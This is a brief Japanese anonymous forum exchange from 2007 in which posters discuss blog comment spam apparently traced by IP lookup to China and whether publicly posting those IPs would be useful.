VIPにも貼るか?
前回の経緯のヤツをw


499 :既にその名前は使われています:2007/10/17(水) 09:04:09.19 ID:okXdb9kl
怪しいURLが張ってあってIP検索したら発信元が北京、上海だった。

日本のプロバイダー経由でスパムしてるって書いてあることが多いけど
うちのBLOGの中華系書き込みは全部IP検索したら中国内のプロバイダーも中国系だ


IP晒していい?




500 :既にその名前は使われています:2007/10/17(水) 09:11:01.09 ID:O4i5Co9/
>487
効果は期待できないんじゃないかな
踏み台やネカフェみたいな一時利用の所だと意味無いし